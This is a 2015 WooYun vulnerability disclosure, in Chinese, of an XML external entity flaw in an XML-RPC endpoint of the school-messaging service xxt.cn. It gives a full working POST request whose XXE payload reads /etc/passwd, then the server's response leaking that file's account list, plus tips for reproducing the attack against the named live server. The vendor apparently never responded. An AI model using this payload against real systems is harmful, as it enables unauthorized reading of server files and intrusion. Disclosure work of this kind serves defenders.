校迅通某关键服务器敏感信息泄露 | wooyun-2015-0101879| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0101879

漏洞标题：校迅通某关键服务器敏感信息泄露

漏洞作者： stackworm

提交时间：2015-03-17 16:17

修复时间：2015-05-01 16:18

公开时间：2015-05-01 16:18

漏洞类型：重要敏感信息泄露

危害等级：中

自评Rank：8

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-17：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-05-01：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

校迅通一直是很多学校,家长,教师之间的短讯平台.
各路黑阔都垂涎其用户数据的商业价值.
校迅通官方的某接口导致的服务器敏感信息泄露

详细说明：

校讯通官方站
http://www.xxt.cn//xmlrpc
是一个
ZendFramework 的 Zend_XmlRpc接口
由于版本过低
导致
服务器敏感文件的泄露

漏洞证明：

构造POST包
如:

POST //xmlrpc HTTP/1.1
Host: www.xxt.cn
Content-Length: 184
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
<?xml version="1.0"?>
 <!DOCTYPE foo [  
  <!ELEMENT methodName ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodCall>
  <methodName>&xxe;</methodName>
</methodCall>

服务器返回:

HTTP/1.1 200 OK
Server: Apache
Date: Tue, 17 Mar 2015 03:40:17 GMT
Content-Type: text/xml
Content-Length: 8961
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: zh-CN
Original-Content-Encoding: gzip
<?xml version="1.0" encoding="GBK"?><methodResponse xmlns:ex="http://ws.apache.org/xmlrpc/namespaces/extensions"><fault><value><struct><member><name>faultCause</name><value><base64>rO0ABXNyADVvcmcuYXBhY2hlLnhtbHJwYy5zZXJ2ZXIuWG1sUnBjTm9TdWNoSGFuZGxlckV4Y2VwdGlvbi0zMjA5MTA1AgAAeHIAIW9yZy5hcGFjaGUueG1scnBjLlhtbFJwY0V4Y2VwdGlvbi05NDcyMzAyAgACSQAEY29kZUwAD2xpbmtlZEV4Y2VwdGlvbnQAFUxqYXZhL2xhbmcvVGhyb3dhYmxlO3hyABNqYXZhLmxhbmcuRXhjZXB0aW9u0P0fPho7HMQCAAB4cgATamF2YS5sYW5nLlRocm93YWJsZdXGNSc5d7jLAwAETAAFY2F1c2VxAH4AAkwADWRldGFpbE1lc3NhZ2V0ABJMamF2YS9sYW5nL1N0cmluZztbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7TAAUc3VwcHJlc3NlZEV4Y2VwdGlvbnN0ABBMamF2YS91dGlsL0xpc3Q7eHBxAH4ACHQHnE5vIHN1Y2ggaGFuZGxlcjogcm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApiaW46eDoxOjE6YmluOi9iaW46L3NiaW4vbm9sb2dpbgpkYWVtb246eDoyOjI6ZGFlbW9uOi9zYmluOi9zYmluL25vbG9naW4KYWRtOng6Mzo0OmFkbTovdmFyL2FkbTovc2Jpbi9ub2xvZ2luCmxwOng6NDo3OmxwOi92YXIvc3Bvb2wvbHBkOi9zYmluL25vbG9naW4Kc3luYzp4OjU6MDpzeW5jOi9zYmluOi9iaW4vc3luYwpzaHV0ZG93bjp4OjY6MDpzaHV0ZG93bjovc2Jpbjovc2Jpbi9zaHV0ZG93bgpoYWx0Ong6NzowOmhhbHQ6L3NiaW46L3NiaW4vaGFsdAptYWlsOng6ODoxMjptYWlsOi92YXIvc3Bvb2wvbWFpbDovc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxNDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovc2Jpbi9ub2xvZ2luCm9wZXJhdG9yOng6MTE6MDpvcGVyYXRvcjovcm9vdDovc2Jpbi9ub2xvZ2luCmdhbWVzOng6MTI6MTAwOmdhbWVzOi91c3IvZ2FtZXM6L3NiaW4vbm9sb2dpbgpnb3BoZXI6eDoxMzozMDpnb3BoZXI6L3Zhci9nb3BoZXI6L3NiaW4vbm9sb2dpbgpmdHA6eDoxNDo1MDpGVFAgVXNlcjovdmFyL2Z0cDovc2Jpbi9ub2xvZ2luCm5vYm9keTp4Ojk5Ojk5Ok5vYm9keTovOi9zYmluL25vbG9naW4KZGJ1czp4OjgxOjgxOlN5c3RlbSBtZXNzYWdlIGJ1czovOi9zYmluL25vbG9naW4KcnBjOng6MzI6MzI6UnBjYmluZCBEYWVtb246L3Zhci9jYWNoZS9ycGNiaW5kOi9zYmluL25vbG9naW4KdmNzYTp4OjY5OjY5OnZpcnR1YWwgY29uc29sZSBtZW1vcnkgb3duZXI6L2Rldjovc2Jpbi9ub2xvZ2luCnJ0a2l0Ong6NDk5OjQ5NzpSZWFsdGltZUtpdDovcHJvYzovc2Jpbi9ub2xvZ2luCmF2YWhpLWF1dG9pcGQ6eDoxNzA6MTcwOkF2YWhpIElQdjRMTCBTdGFjazovdmFyL2xpYi9hdmFoaS1hdXRvaXBkOi9zYmluL25vbG9naW4KcHVsc2U6eDo0OTg6NDk2OlB1bHNlQXVkaW8gU3lzdGVtIERhZW1vbjovdmFyL3J1bi9wdWxzZTovc2Jpbi9ub2xvZ2luCmhhbGRhZW1vbjp4OjY4OjY4OkhBTCBkYWVtb246Lzovc2Jpbi9ub2xvZ2luCm50cDp4OjM4OjM4OjovZXRjL250cDovc2Jpbi9ub2xvZ2luCnNhc2xhdXRoOng6NDk3Ojc2OiJTYXNsYXV0aGQgdXNlciI6L3Zhci9lbXB0eS9zYXNsYXV0aDovc2Jpbi9ub2xvZ2luCnBvc3RmaXg6eDo4OTo4OTo6L3Zhci9zcG9vbC9wb3N0Zml4Oi9zYmluL25vbG9naW4KYWJydDp4OjE3MzoxNzM6Oi9ldGMvYWJydDovc2Jpbi9ub2xvZ2luCnJwY3VzZXI6eDoyOToyOTpSUEMgU2VydmljZSBVc2VyOi92YXIvbGliL25mczovc2Jpbi9ub2xvZ2luCm5mc25vYm9keTp4OjY1NTM0OjY1NTM0OkFub255bW91cyBORlMgVXNlcjovdmFyL2xpYi9uZnM6L3NiaW4vbm9sb2dpbgpnZG06eDo0Mjo0Mjo6L3Zhci9saWIvZ2RtOi9zYmluL25vbG9naW4Kc3NoZDp4Ojc0Ojc0OlByaXZpbGVnZS1zZXBhcmF0ZWQgU1NIOi92YXIvZW1wdHkvc3NoZDovc2Jpbi9ub2xvZ2luCnRjcGR1bXA6eDo3Mjo3Mjo6Lzovc2Jpbi9ub2xvZ2luCm9wcm9maWxlOng6MTY6MTY6U3BlY2lhbCB1c2VyIGFjY291bnQgdG8gYmUgdXNlZCBieSBPUHJvZmlsZTovaG9tZS9vcHJvZmlsZTovc2Jpbi9ub2xvZ2luCnRvbWNhdDp4OjUwODo1MDg6Oi91c3IveHh0c3JjOi9iaW4vYmFzaApyZW1vdGU6eDo1MDk6NTA5OjovdXNyL3UwMS9zaGVsbC9yZW1vdGU6L2Jpbi9iYXNoCmRyaWZ0Ong6NTEwOjUxMDo6L3Vzci94eHRzcmMvZHJpZnQ6L2Jpbi9iYXNoCm5hZ2lvczp4OjUxMTo1MTE6Oi9ob21lL25hZ2lvczovc2Jpbi9ub2xvZ2luCm5naW54Ong6NTEyOjUxMjo6L2hvbWUvbmdpbng6L3NiaW4vbm9sb2dpbgptZnM6eDo1MTM6NTEzOjovaG9tZS9tZnM6L3NiaW4vbm9sb2dpbgpyZWFkb25seTp4OjUxNDo1MTQ6Oi91c3IveHh0c3JjOi9iaW4vYmFzaAptb2JpbGU6eDo1MTU6NTE1OjovdXNyL3h4dHNyYy94eHRfbW9iaWxlOi9iaW4vYmFzaAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAAB5zcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4ABUwACGZpbGVOYW1lcQB+AAVMAAptZXRob2ROYW1lcQB+AAV4cAAAANZ0ADlvcmcuYXBhY2hlLnhtbHJwYy5zZXJ2ZXIuQWJzdHJhY3RSZWZsZWN0aXZlSGFuZGxlck1hcHBpbmd0ACVBYnN0cmFjdFJlZmxlY3RpdmVIYW5kbGVyTWFwcGluZy5qYXZhdAAKZ2V0SGFuZGxlcnNxAH4ADAAAAC10ACtvcmcuYXBhY2hlLnhtbHJwYy5zZXJ2ZXIuWG1sUnBjU2VydmVyV29ya2VydAAXWG1sUnBjU2VydmVyV29ya2VyLmphdmF0AAdleGVjdXRlc3EAfgAMAAAAVnQAJW9yZy5hcGFjaGUueG1scnBjLnNlcnZlci5YbWxScGNTZXJ2ZXJ0ABFYbWxScGNTZXJ2ZXIuamF2YXEAfgAUc3EAfgAMAAAAxHQAK29yZy5hcGFjaGUueG1scnBjLnNlcnZlci5YbWxScGNTdHJlYW1TZXJ2ZXJ0ABdYbWxScGNTdHJlYW1TZXJ2ZXIuamF2YXEAfgAUc3EAfgAMAAAAbXQAL29yZy5hcGFjaGUueG1scnBjLndlYnNlcnZlci5YbWxScGNTZXJ2bGV0U2VydmVydAAYWG1sUnBjU2VydmxldFNlcnZlci5qYXZhcQB+ABRzcQB+AAwAAADCdAApb3JnLmFwYWNoZS54bWxycGMud2Vic2VydmVyLlhtbFJwY1NlcnZsZXR0ABJYbWxScGNTZXJ2bGV0LmphdmF0AAZkb1Bvc3RzcQB+AAwAAAKHdAAeamF2YXguc2VydmxldC5odHRwLkh0dHBTZXJ2bGV0dAAQSHR0cFNlcnZsZXQuamF2YXQAB3NlcnZpY2VzcQB+AAwAAALYcQB+ACNxAH4AJHEAfgAlc3EAfgAMAAABMXQAL29yZy5hcGFjaGUuY2F0YWxpbmEuY29yZS5BcHBsaWNhdGlvbkZpbHRlckNoYWludAAbQXBwbGljYXRpb25GaWx0ZXJDaGFpbi5qYXZhdAAQaW50ZXJuYWxEb0ZpbHRlcnNxAH4ADAAAANJxAH4AKHEAfgApdAAIZG9GaWx0ZXJzcQB+AAwAAAAhdAAeY29tLnh4dC5maWx0ZXIuU2V0SGVhZGVyRmlsdGVydAAUU2V0SGVhZGVyRmlsdGVyLmphdmFxAH4ALHNxAH4ADAAAAPNxAH4AKHEAfgApcQB+ACpzcQB+AAwAAADScQB+AChxAH4AKXEAfgAsc3EAfgAMAAAAvXQANGNvbS5vcGVuc3ltcGhvbnkud2Vid29yay5kaXNwYXRjaGVyLkZpbHRlckRpc3BhdGNoZXJ0ABVGaWx0ZXJEaXNwYXRjaGVyLmphdmFxAH4ALHNxAH4ADAAAAPNxAH4AKHEAfgApcQB+ACpzcQB+AAwAAADScQB+AChxAH4AKXEAfgAsc3EAfgAMAAAA3nQALW9yZy5hcGFjaGUuY2F0YWxpbmEuY29yZS5TdGFuZGFyZFdyYXBwZXJWYWx2ZXQAGVN0YW5kYXJkV3JhcHBlclZhbHZlLmphdmF0AAZpbnZva2VzcQB+AAwAAAB7dAAtb3JnLmFwYWNoZS5jYXRhbGluYS5jb3JlLlN0YW5kYXJkQ29udGV4dFZhbHZldAAZU3RhbmRhcmRDb250ZXh0VmFsdmUuamF2YXEAfgA6c3EAfgAMAAAB9nQAM29yZy5hcGFjaGUuY2F0YWxpbmEuYXV0aGVudGljYXRvci5BdXRoZW50aWNhdG9yQmFzZXQAFkF1dGhlbnRpY2F0b3JCYXNlLmphdmFxAH4AOnNxAH4ADAAAAKt0ACpvcmcuYXBhY2hlLmNhdGFsaW5hLmNvcmUuU3RhbmRhcmRIb3N0VmFsdmV0ABZTdGFuZGFyZEhvc3RWYWx2ZS5qYXZhcQB+ADpzcQB+AAwAAABjdAArb3JnLmFwYWNoZS5jYXRhbGluYS52YWx2ZXMuRXJyb3JSZXBvcnRWYWx2ZXQAFUVycm9yUmVwb3J0VmFsdmUuamF2YXEAfgA6c3EAfgAMAAADuXQAKW9yZy5hcGFjaGUuY2F0YWxpbmEudmFsdmVzLkFjY2Vzc0xvZ1ZhbHZldAATQWNjZXNzTG9nVmFsdmUuamF2YXEAfgA6c3EAfgAMAAAAdnQALG9yZy5hcGFjaGUuY2F0YWxpbmEuY29yZS5TdGFuZGFyZEVuZ2luZVZhbHZldAAYU3RhbmRhcmRFbmdpbmVWYWx2ZS5qYXZhcQB+ADpzcQB+AAwAAAGYdAArb3JnLmFwYWNoZS5jYXRhbGluYS5jb25uZWN0b3IuQ295b3RlQWRhcHRlcnQAEkNveW90ZUFkYXB0ZXIuamF2YXEAfgAlc3EAfgAMAAAD/3QAMG9yZy5hcGFjaGUuY295b3RlLmh0dHAxMS5BYnN0cmFjdEh0dHAxMVByb2Nlc3NvcnQAHEFic3RyYWN0SHR0cDExUHJvY2Vzc29yLmphdmF0AAdwcm9jZXNzc3EAfgAMAAACTXQAPG9yZy5hcGFjaGUuY295b3RlLkFic3RyYWN0UHJvdG9jb2wkQWJzdHJhY3RDb25uZWN0aW9uSGFuZGxlcnQAFUFic3RyYWN0UHJvdG9jb2wuamF2YXEAfgBTc3EAfgAMAAAHEnQAQW9yZy5hcGFjaGUudG9tY2F0LnV0aWwubmV0LkFwckVuZHBvaW50JFNvY2tldFdpdGhPcHRpb25zUHJvY2Vzc29ydAAQQXByRW5kcG9pbnQuamF2YXQAA3J1bnNxAH4ADAAABHl0ACdqYXZhLnV0aWwuY29uY3VycmVudC5UaHJlYWRQb29sRXhlY3V0b3J0ABdUaHJlYWRQb29sRXhlY3V0b3IuamF2YXQACXJ1bldvcmtlcnNxAH4ADAAAAmd0AC5qYXZhLnV0aWwuY29uY3VycmVudC5UaHJlYWRQb29sRXhlY3V0b3IkV29ya2VycQB+AF1xAH4AWnNxAH4ADAAAAtR0ABBqYXZhLmxhbmcuVGhyZWFkdAALVGhyZWFkLmphdmFxAH4AWnNyACZqYXZhLnV0aWwuQ29sbGVjdGlvbnMkVW5tb2RpZmlhYmxlTGlzdPwPJTG17I4QAgABTAAEbGlzdHEAfgAHeHIALGphdmEudXRpbC5Db2xsZWN0aW9ucyRVbm1vZGlmaWFibGVDb2xsZWN0aW9uGUIAgMte9x4CAAFMAAFjdAAWTGphdmEvdXRpbC9Db2xsZWN0aW9uO3hwc3IAE2phdmEudXRpbC5BcnJheUxpc3R4gdIdmcdhnQMAAUkABHNpemV4cAAAAAB3BAAAAAB4cQB+AGl4AAAAAHA=</base64></value></member><member><name>faultCode</name><value><i4>0</i4></value></member><member><name>faultString</name><value>No such handler: root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
pulse:x:498:496:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:497:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
tomcat:x:508:508::/usr/xxtsrc:/bin/bash
remote:x:509:509::/usr/u01/shell/remote:/bin/bash
drift:x:510:510::/usr/xxtsrc/drift:/bin/bash
nagios:x:511:511::/home/nagios:/sbin/nologin
nginx:x:512:512::/home/nginx:/sbin/nologin
mfs:x:513:513::/home/mfs:/sbin/nologin
readonly:x:514:514::/usr/xxtsrc:/bin/bash
mobile:x:515:515::/usr/xxtsrc/xxt_mobile:/bin/bash
</value></member></struct></value></fault></methodResponse>

漏洞复现时，注意地域IP（河南最好）
另外在构造post包时，注意 <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
其中file:///必须为三个斜杠
否则将返回
“Failed to parse XML-RPC request: Premature end of file.”

修复方案：

参见官方
http://framework.zend.com/security/advisory/ZF2012-01

版权声明：转载请注明来源 stackworm@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：8 (WooYun评价)